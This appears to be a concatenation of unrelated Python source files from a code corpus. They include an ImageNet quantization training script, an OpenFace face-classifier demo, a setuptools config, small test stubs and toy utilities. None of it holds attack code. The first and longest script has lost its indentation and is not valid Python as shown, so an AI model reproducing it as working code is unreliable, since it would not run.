from utils import Bar, Logger, AverageMeter, accuracy, mkdir_p, savefig
from utils.dataloaders import *
from tensorboardX import SummaryWriter
#! add by dongz
import torch.fx
from qnq_src.qnq import *
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
default_model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
customized_models_names = sorted(
name for name in customized_models.__dict__
if name.islower() and not name.startswith("__")
and callable(customized_models.__dict__[name]))
for name in customized_models.__dict__:
if name.islower() and not name.startswith("__") and callable(
customized_models.__dict__[name]):
models.__dict__[name] = customized_models.__dict__[name]
model_names = default_model_names + customized_models_names
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('-d', '--data', metavar='DIR', help='path to dataset')
parser.add_argument('--data-backend',
metavar='BACKEND',
default='pytorch',
choices=DATA_BACKEND_CHOICES)
parser.add_argument('-a',
'--arch',
metavar='ARCH',
default='resnet18',
choices=model_names,
help='model architecture: ' + ' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('-j',
'--workers',
default=4,
type=int,
metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs',
default=90,
type=int,
metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch',
default=0,
type=int,
metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument(
'-b',
'--batch-size',
default=256,
# default=64,
type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr',
'--learning-rate',
default=0.1,
type=float,
metavar='LR',
help='initial learning rate',
dest='lr')
parser.add_argument('--momentum',
default=0.9,
type=float,
metavar='M',
help='momentum')
parser.add_argument('--wd',
'--weight-decay',
default=1e-4,
type=float,
metavar='W',
help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('-p',
'--print-freq',
default=10,
type=int,
metavar='N',
help='print frequency (default: 10)')
parser.add_argument('--resume',
default='',
type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e',
'--evaluate',
dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained',
dest='pretrained',
action='store_true',
help='use pre-trained model')
parser.add_argument('--world-size',
default=-1,
type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank',
default=-1,
type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url',
default='tcp://224.66.41.62:23456',
type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend',
default='nccl',
type=str,
help='distributed backend')
parser.add_argument('--seed',
default=None,
type=int,
help='seed for initializing training. ')
parser.add_argument('--lr-decay',
type=str,
default='step',
help='mode for learning rate decay')
parser.add_argument('--step',
type=int,
default=30,
help='interval for learning rate decay in step mode')
parser.add_argument('--schedule',
type=int,
nargs='+',
default=[150, 225],
help='decrease learning rate at these epochs.')
parser.add_argument('--gamma',
type=float,
default=0.1,
help='LR is multiplied by gamma on schedule.')
parser.add_argument(
'--warmup',
action='store_true',
help='set lower initial learning rate to warm up the training')
parser.add_argument('-c',
'--checkpoint',
default='checkpoints',
type=str,
metavar='PATH',
help='path to save checkpoint (default: checkpoints)')
parser.add_argument('--width-mult',
type=float,
default=1.0,
help='MobileNet model width multiplier.')
parser.add_argument('--input-size',
type=int,
default=224,
help='MobileNet model input resolution')
parser.add_argument('--weight',
default='',
type=str,
metavar='WEIGHT',
help='path to pretrained weight (default: none)')
best_prec1 = 0
def main():
#! add by dongz
global val_loader
global val_loader_len
global model
global criterion
global dict_t
dict_t = {-1: 300, 20: 600, 50: 1000, 100: 2000}
# dict_t = {-1: 200, 5: 260, 10: 300, 20: 600, 30: 1000, 50: 2000, 100: 3000}
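    # dict_t maps an epoch index to the quantization temperature T: validate() calls
    # quant.updateT(dict_t[epoch + 1]) whenever the finished epoch appears as a key,
    # and the -1 entry is applied by the initial validation pass before training starts.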
global args, best_prec1
args = parser.parse_args()
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
args.distributed = args.world_size > 1
if args.distributed:
dist.init_process_group(backend=args.dist_backend,
init_method=args.dist_url,
world_size=args.world_size)
# create model
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch](width_mult=args.width_mult)
if not args.distributed:
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
#!ori
model = torch.nn.DataParallel(model).cuda()
model = model.cuda()
else:
model.cuda()
model = torch.nn.parallel.DistributedDataParallel(model)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
#! first use of checkpoint, edit by dongz
dongz_logger, args.checkpoint = lognow(save_path="./expriment/")
dongz_logger.info(str(dict_t))
# optionally resume from a checkpoint
title = 'ImageNet-' + args.arch
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# if args.resume:
# if os.path.isfile(args.resume):
# print("=> loading checkpoint '{}'".format(args.resume))
# checkpoint = torch.load(args.resume)
# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
# model.load_state_dict(checkpoint['state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer'])
# print("=> loaded checkpoint '{}' (epoch {})".format(
# args.resume, checkpoint['epoch']))
# args.checkpoint = os.path.dirname(args.resume)
# logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
# title=title,
# resume=True)
# else:
# print("=> no checkpoint found at '{}'".format(args.resume))
# else:
# logger = Logger(os.path.join(args.checkpoint, 'log.txt'), title=title)
# logger.set_names([
# 'Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.',
# 'Valid Acc.'
# ])
cudnn.benchmark = True
# Data loading code
if args.data_backend == 'pytorch':
get_train_loader = get_pytorch_train_loader
get_val_loader = get_pytorch_val_loader
elif args.data_backend == 'dali-gpu':
get_train_loader = get_dali_train_loader(dali_cpu=False)
get_val_loader = get_dali_val_loader()
elif args.data_backend == 'dali-cpu':
get_train_loader = get_dali_train_loader(dali_cpu=True)
get_val_loader = get_dali_val_loader()
#! edit by dongz
train_loader, train_loader_len = get_train_loader(
args.data,
args.batch_size,
workers=args.workers,
input_size=args.input_size)
val_loader, val_loader_len = get_val_loader(args.data,
args.batch_size,
workers=args.workers,
input_size=args.input_size)
# train_loader, train_loader_len = (val_loader, val_loader_len)
#! edit by dongz
if True:
# if args.evaluate:
from collections import OrderedDict
if os.path.isfile(args.weight):
print("=> loading pretrained weight '{}'".format(args.weight))
source_state = torch.load(args.weight)
target_state = OrderedDict()
for k, v in source_state.items():
if k[:7] != 'module.':
k = 'module.' + k
target_state[k] = v
model.load_state_dict(target_state)
else:
print("=> no weight found at '{}'".format(args.weight))
#! edit by dongz
model.eval()
quantize(model)
optimizer = torch.optim.SGD(model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})".format(
args.resume, checkpoint['epoch']))
args.checkpoint = os.path.dirname(args.resume)
logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
title=title,
resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
title=title)
logger.set_names([
'Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.',
'Valid Acc.'
])
# model.train()
# print("val val")
validate(val_loader, val_loader_len, model, criterion, -2)
model.train()
# return
# visualization
writer = SummaryWriter(os.path.join(args.checkpoint, 'logs'))
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
print('\nEpoch: [%d | %d]' % (epoch + 1, args.epochs))
# train for one epoch
print("train " + str(epoch) + " epoch")
train_loss, train_acc = train(train_loader, train_loader_len, model,
criterion, optimizer, epoch)
# evaluate on validation set
print("val " + str(epoch) + " epoch")
val_loss, prec1 = validate(val_loader, val_loader_len, model,
criterion, epoch)
lr = optimizer.param_groups[0]['lr']
# append logger file
logger.append([lr, train_loss, val_loss, train_acc, prec1])
# tensorboardX
writer.add_scalar('learning rate', lr, epoch + 1)
writer.add_scalars('loss', {
'train loss': train_loss,
'validation loss': val_loss
}, epoch + 1)
writer.add_scalars('accuracy', {
'train accuracy': train_acc,
'validation accuracy': prec1
}, epoch + 1)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint(
{
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer': optimizer.state_dict(),
},
is_best,
checkpoint=args.checkpoint)
logger.close()
logger.plot()
savefig(os.path.join(args.checkpoint, 'log.eps'))
writer.close()
print('Best accuracy:')
print(best_prec1)
def train(train_loader, train_loader_len, model, criterion, optimizer, epoch):
bar = Bar('Processing', max=train_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
    # switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
#! edit by dongz
# adjust_learning_rate(optimizer, epoch, i, train_loader_len)
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Train Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=train_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
return (losses.avg, top1.avg)
def validate(val_loader, val_loader_len, model, criterion, epoch):
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
#! add by dongz
quant.eval_mode(True)
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Eval Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
#! add by dongz, updateT for trainning
quant.eval_mode(False)
now_epoch = epoch + 1
if now_epoch in dict_t:
quant.updateT(dict_t[now_epoch])
print("now epoch " + str(now_epoch) + ", now T = " +
str(dict_t[now_epoch]))
return (losses.avg, top1.avg)
def save_checkpoint(state,
is_best,
checkpoint='checkpoint',
filename='checkpoint.pth.tar'):
filepath = os.path.join(checkpoint, filename)
torch.save(state, filepath)
if is_best:
shutil.copyfile(filepath, os.path.join(checkpoint,
'model_best.pth.tar'))
from math import cos, pi
def adjust_learning_rate(optimizer, epoch, iteration, num_iter):
lr = optimizer.param_groups[0]['lr']
warmup_epoch = 5 if args.warmup else 0
warmup_iter = warmup_epoch * num_iter
current_iter = iteration + epoch * num_iter
max_iter = args.epochs * num_iter
if args.lr_decay == 'step':
lr = args.lr * (args.gamma**((current_iter - warmup_iter) /
(max_iter - warmup_iter)))
elif args.lr_decay == 'cos':
lr = args.lr * (1 + cos(pi * (current_iter - warmup_iter) /
(max_iter - warmup_iter))) / 2
elif args.lr_decay == 'linear':
lr = args.lr * (1 - (current_iter - warmup_iter) /
(max_iter - warmup_iter))
elif args.lr_decay == 'schedule':
count = sum([1 for s in args.schedule if s <= epoch])
lr = args.lr * pow(args.gamma, count)
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_decay))
if epoch < warmup_epoch:
lr = args.lr * current_iter / warmup_iter
for param_group in optimizer.param_groups:
param_group['lr'] = lr
#! add by dongz
def metrics():
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
return top1.avg
def steper():
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
quant.step()
def quantize(model, val_loader=None, val_loader_len=None, criterion=None):
global quant
save_path = "./checkpoints"
config_path = './checkpoints/config/config_dev.yaml'
quant = QNQ(model.module, save_path, config_path, metrics, metrics, steper)
model.module = quant.model
# model = torch.nn.DataParallel(model).cuda()
# quant.search()
# dummy_input = torch.randn(10, 3, 224, 224, device='cuda')
# torch.onnx.export(model, dummy_input, "mobilenetv2.onnx", verbose=True)
# validate(val_loader, val_loader_len, model, criterion)
#! torch fx
# import torch.quantization.quantize_fx as quantize_fx
# model.module = quantize_fx.fuse_fx(model.module)
# # debug_count = 0
# tracer = ModulePathTracer()
# g = tracer.trace(model.module)
# gm = torch.fx.GraphModule(model.module, g)
# gm.graph.print_tabular()
# for node in g.nodes:
# module_qualname = tracer.node_to_originating_module.get(node)
# print('Node', node, 'is from module', module_qualname)
# m = dict(gm.named_modules())
# for node in gm.graph.nodes:
# mnode = m.get(tracer.node_to_originating_module.get(node))
# module_qualname = tracer.node_to_originating_module.get(node)
# if node.op == "call_module" and isinstance(
# mnode, nn.Conv2d):
# # debug_count += 1
# with gm.graph.inserting_before(node):
# # st = SigmoidT(m.get(module_qualname))
# st = FXQuantor(mnode)
# gm.add_submodule(module_qualname, st)
# new_node = gm.graph.call_module(module_qualname, node.args,
# node.kwargs)
# node.replace_all_uses_with(new_node)
# # Remove the old node from the graph
# gm.graph.erase_node(node)
# gm.recompile()
# """
# dummy = torch.randn([1, 3, 224, 224]).cuda()
# ir = torch.fx.Interpreter(gm)
# ir.run(dummy)
# """
# gm.graph.print_tabular()
# model.module = gm
pass
def transform():
pass
if __name__ == '__main__':
main()
|
py | b415074f21619d17d5f9ef71fda8fac03dea8066 | from .azureblobio import *
__version__ = '0.1.0'
|
py | b41507f5258f94677dac19b7bb9866eae1776ebe | from .base import AttackGoal
from .classifier_goal import ClassifierGoal |
py | b4150b139396b83081a96b0fb00ad0fb445dfd14 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 3 17:55:52 2021
@author: jacob
"""
"""
Object to hold data about each 96 well plate in an experiment,
including a mapping of where and how replicates are grouped """
class Plate(object):
def __init__(self, name):
self.name = name
self.replicate_map = {}
self.parameter_map = {}
    def __repr__(self):
rep = f"{self.name}:\n"
for repl_name in self.replicate_map.keys():
rep += f"{repl_name}: {self.replicate_map[repl_name]}"
return rep
def __str__(self):
rep = f"{self.name}:\n"
for repl_name in self.replicate_map.keys():
rep += f"{repl_name}: {self.replicate_map[repl_name]}\n"
return rep
def add_repl(self, repl_name, wells):
self.replicate_map[repl_name] = wells
# Keeps track of growth rates and ymaxs in each well of the plate
    # Note: not safe, wrap calls in a try/except block (KeyError)
def add_params(self, gr, ymax, well):
self.parameter_map[well] = [gr, ymax]
    # Note: not safe, wrap calls in a try/except block (KeyError)
def get_params(self, well):
return self.parameter_map[well][0], self.parameter_map[well][1]
def get_all_params(self):
return self.parameter_map
def get_wells(self, repl_name):
return self.replicate_map[repl_name]
def get_repl_names(self):
return list(self.replicate_map.keys())
def get_plate_name(self):
return self.name
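# Minimal usage sketch (illustrative only; the plate name, replicate labels, wells and
# parameter values below are hypothetical):
if __name__ == "__main__":
    plate = Plate("plate_01")
    plate.add_repl("strain_A", ["A1", "A2", "A3"])
    plate.add_params(gr=0.42, ymax=1.3, well="A1")
    print(plate)
    try:
        gr, ymax = plate.get_params("A1")
        print(f"A1 growth rate: {gr}, ymax: {ymax}")
    except KeyError:
        # get_params raises KeyError for wells without fitted parameters
        print("A1 has no fitted parameters")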
|
py | b4150b542fdc13ba9c08070ac3d789f1b2d5ff67 | from quantum import QRegister, H
def quantum_randbit():
a = QRegister(1, '0')
a.apply(H)
return a.measure()
for i in range(32):
print(quantum_randbit(), end='')
print()
|
py | b4150c800ce80506032d19ddfb1f73c4bcb598e0 | import pytest
from opera.error import ParseError
from opera.parser.tosca.v_1_3.constraint_clause import ConstraintClause
class TestValidate:
def test_valid_clause(self, yaml_ast):
ConstraintClause.validate(yaml_ast("equal: 3"))
def test_invalid_clause(self, yaml_ast):
with pytest.raises(ParseError):
ConstraintClause.validate(yaml_ast("bad_operator: must fail"))
class TestParse:
def test_parse(self, yaml_ast):
ConstraintClause.parse(yaml_ast("in_range: [ 1, 2 ]"))
|
py | b4150d6a79f755e8002fb7cbfdd242e85c8dde10 | import os
import sys
from setuptools import find_packages, setup
from setuptools.command.install import install
VERSION = "0.1.1"
DESCRIPTION = open("README.md", encoding="utf-8").read()
class VerifyVersionCommand(install):
"""Custom command to verify that the git tag matches our version"""
description = "verify that the git tag matches our version"
def run(self):
tag = os.getenv("CIRCLE_TAG")
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(tag, VERSION)
sys.exit(info)
setup(
name="django-email-tools",
version=VERSION,
packages=find_packages(exclude=["tests"]),
include_package_data=True,
url="https://github.com/pennlabs/django-email-tools",
project_urls={
"Changelog": ("https://github.com/pennlabs/django-email-tools/blob/master/CHANGELOG.md")
},
license="MIT",
author="Penn Labs",
author_email="[email protected]",
description="A collection of Django email tools",
long_description=DESCRIPTION,
long_description_content_type="text/markdown",
install_requires=["django>=2.0.0", "beautifulsoup4<=5"],
classifiers=[
"Framework :: Django",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
python_requires=">=3.6",
cmdclass={"verify": VerifyVersionCommand},
)
|
py | b4150eac7d86b8971619dea802592da5af6c478a | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import opsgenie_swagger
from opsgenie_swagger.models.detectify_integration import DetectifyIntegration # noqa: E501
from opsgenie_swagger.rest import ApiException
class TestDetectifyIntegration(unittest.TestCase):
"""DetectifyIntegration unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDetectifyIntegration(self):
"""Test DetectifyIntegration"""
# FIXME: construct object with mandatory attributes with example values
# model = opsgenie_swagger.models.detectify_integration.DetectifyIntegration() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | b4150f62afc6e9b8d415381d88f21f7dfa5a3f65 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nemo.collections.nlp.modules.common import (
AlbertEncoder,
BertEncoder,
BertModule,
CamembertEncoder,
DistilBertEncoder,
PromptEncoder,
PromptTable,
RobertaEncoder,
SequenceClassifier,
SequenceRegression,
SequenceTokenClassifier,
get_lm_model,
get_pretrained_lm_models_list,
get_tokenizer,
get_tokenizer_list,
)
from nemo.collections.nlp.modules.dialogue_state_tracking.sgd_decoder import SGDDecoder
from nemo.collections.nlp.modules.dialogue_state_tracking.sgd_encoder import SGDEncoder
|
py | b415100721318dd48c53702254745f610bfd543c | #!/usr/bin/env python2
#
# Example to classify faces.
# Brandon Amos
# 2015/10/11
#
# Copyright 2015-2016 Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
start = time.time()
import argparse
import cv2
import os
import pickle
from operator import itemgetter
import numpy as np
np.set_printoptions(precision=2)
import pandas as pd
import openface
from sklearn.pipeline import Pipeline
from sklearn.lda import LDA
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.grid_search import GridSearchCV
from sklearn.mixture import GMM
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
fileDir = os.path.dirname(os.path.realpath(__file__))
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
def getRep(imgPath):
start = time.time()
bgrImg = cv2.imread(imgPath)
if bgrImg is None:
raise Exception("Unable to load image: {}".format(imgPath))
rgbImg = cv2.cvtColor(bgrImg, cv2.COLOR_BGR2RGB)
if args.verbose:
print(" + Original size: {}".format(rgbImg.shape))
if args.verbose:
print("Loading the image took {} seconds.".format(time.time() - start))
start = time.time()
bb = align.getLargestFaceBoundingBox(rgbImg)
if bb is None:
raise Exception("Unable to find a face: {}".format(imgPath))
if args.verbose:
print("Face detection took {} seconds.".format(time.time() - start))
start = time.time()
alignedFace = align.align(
args.imgDim,
rgbImg,
bb,
landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)
if alignedFace is None:
raise Exception("Unable to align image: {}".format(imgPath))
if args.verbose:
print("Alignment took {} seconds.".format(time.time() - start))
start = time.time()
rep = net.forward(alignedFace)
if args.verbose:
print("Neural network forward pass took {} seconds.".format(
time.time() - start))
return rep
def train(args):
print("Loading embeddings.")
fname = "{}/labels.csv".format(args.workDir)
labels = pd.read_csv(fname, header=None).as_matrix()[:, 1]
labels = map(itemgetter(1),
map(os.path.split,
map(os.path.dirname, labels))) # Get the directory.
fname = "{}/reps.csv".format(args.workDir)
embeddings = pd.read_csv(fname, header=None).as_matrix()
le = LabelEncoder().fit(labels)
labelsNum = le.transform(labels)
nClasses = len(le.classes_)
print("Training for {} classes.".format(nClasses))
if args.classifier == 'LinearSvm':
clf = SVC(C=1, kernel='linear', probability=True)
elif args.classifier == 'GridSearchSvm':
print("""
Warning: In our experiences, using a grid search over SVM hyper-parameters only
gives marginally better performance than a linear SVM with C=1 and
is not worth the extra computations of performing a grid search.
""")
param_grid = [
{'C': [1, 10, 100, 1000],
'kernel': ['linear']},
{'C': [1, 10, 100, 1000],
'gamma': [0.001, 0.0001],
'kernel': ['rbf']}
]
clf = GridSearchCV(SVC(C=1, probability=True), param_grid, cv=5)
elif args.classifier == 'GMM': # Doesn't work best
clf = GMM(n_components=nClasses)
# ref:
# http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html#example-classification-plot-classifier-comparison-py
elif args.classifier == 'RadialSvm': # Radial Basis Function kernel
# works better with C = 1 and gamma = 2
clf = SVC(C=1, kernel='rbf', probability=True, gamma=2)
elif args.classifier == 'DecisionTree': # Doesn't work best
clf = DecisionTreeClassifier(max_depth=20)
elif args.classifier == 'GaussianNB':
clf = GaussianNB()
# ref: https://jessesw.com/Deep-Learning/
elif args.classifier == 'DBN':
from nolearn.dbn import DBN
clf = DBN([embeddings.shape[1], 500, labelsNum[-1:][0] + 1], # i/p nodes, hidden nodes, o/p nodes
learn_rates=0.3,
# Smaller steps mean a possibly more accurate result, but the
# training will take longer
learn_rate_decays=0.9,
# a factor the initial learning rate will be multiplied by
# after each iteration of the training
epochs=300, # no of iternation
# dropouts = 0.25, # Express the percentage of nodes that
# will be randomly dropped as a decimal.
verbose=1)
if args.ldaDim > 0:
clf_final = clf
clf = Pipeline([('lda', LDA(n_components=args.ldaDim)),
('clf', clf_final)])
clf.fit(embeddings, labelsNum)
fName = "{}/classifier.pkl".format(args.workDir)
print("Saving classifier to '{}'".format(fName))
with open(fName, 'w') as f:
pickle.dump((le, clf), f)
def infer(args):
with open(args.classifierModel, 'r') as f:
(le, clf) = pickle.load(f)
for img in args.imgs:
print("\n=== {} ===".format(img))
rep = getRep(img).reshape(1, -1)
start = time.time()
predictions = clf.predict_proba(rep).ravel()
maxI = np.argmax(predictions)
person = le.inverse_transform(maxI)
confidence = predictions[maxI]
if args.verbose:
print("Prediction took {} seconds.".format(time.time() - start))
print("Predict {} with {:.2f} confidence.".format(person, confidence))
if isinstance(clf, GMM):
dist = np.linalg.norm(rep - clf.means_[maxI])
print(" + Distance from the mean: {}".format(dist))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--dlibFacePredictor',
type=str,
help="Path to dlib's face predictor.",
default=os.path.join(
dlibModelDir,
"shape_predictor_68_face_landmarks.dat"))
parser.add_argument(
'--networkModel',
type=str,
help="Path to Torch network model.",
default=os.path.join(
openfaceModelDir,
'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int,
help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--verbose', action='store_true')
subparsers = parser.add_subparsers(dest='mode', help="Mode")
trainParser = subparsers.add_parser('train',
help="Train a new classifier.")
trainParser.add_argument('--ldaDim', type=int, default=-1)
trainParser.add_argument(
'--classifier',
type=str,
choices=[
'LinearSvm',
'GridSearchSvm',
'GMM',
'RadialSvm',
'DecisionTree',
'GaussianNB',
'DBN'],
help='The type of classifier to use.',
default='LinearSvm')
trainParser.add_argument(
'workDir',
type=str,
help="The input work directory containing 'reps.csv' and 'labels.csv'. Obtained from aligning a directory with 'align-dlib' and getting the representations with 'batch-represent'.")
inferParser = subparsers.add_parser(
'infer', help='Predict who an image contains from a trained classifier.')
inferParser.add_argument(
'classifierModel',
type=str,
help='The Python pickle representing the classifier. This is NOT the Torch network model, which can be set with --networkModel.')
inferParser.add_argument('imgs', type=str, nargs='+',
help="Input image.")
args = parser.parse_args()
if args.verbose:
print("Argument parsing and import libraries took {} seconds.".format(
time.time() - start))
if args.mode == 'infer' and args.classifierModel.endswith(".t7"):
raise Exception("""
Torch network model passed as the classification model,
which should be a Python pickle (.pkl)
See the documentation for the distinction between the Torch
network and classification models:
http://cmusatyalab.github.io/openface/demo-3-classifier/
http://cmusatyalab.github.io/openface/training-new-models/
Use `--networkModel` to set a non-standard Torch network model.""")
start = time.time()
align = openface.AlignDlib(args.dlibFacePredictor)
net = openface.TorchNeuralNet(args.networkModel, imgDim=args.imgDim,
cuda=args.cuda)
if args.verbose:
print("Loading the dlib and OpenFace models took {} seconds.".format(
time.time() - start))
start = time.time()
if args.mode == 'train':
train(args)
elif args.mode == 'infer':
infer(args)
|
py | b41510616714ef2355260c2a7b84ccfe1c723005 | import repycudd
import sym_dot
from bidict import bidict # to install use pip install bidict
mgr = repycudd.DdManager()
x0 = mgr.IthVar(0)
x1 = mgr.IthVar(1)
x2 = mgr.IthVar(2)
x3 = mgr.IthVar(3)
x4 = mgr.IthVar(4)
x5 = mgr.IthVar(5)
x6 = mgr.IthVar(6)
x7 = mgr.IthVar(7)
x8 = mgr.IthVar(8)
x9 = mgr.IthVar(9)
x10 = mgr.IthVar(10)
x11 = mgr.IthVar(11)
t1 = mgr.And(mgr.And(x0,x1), mgr.And(x2,x3))
t2 = mgr.And(mgr.And(x4,x5), mgr.And(x6,x7))
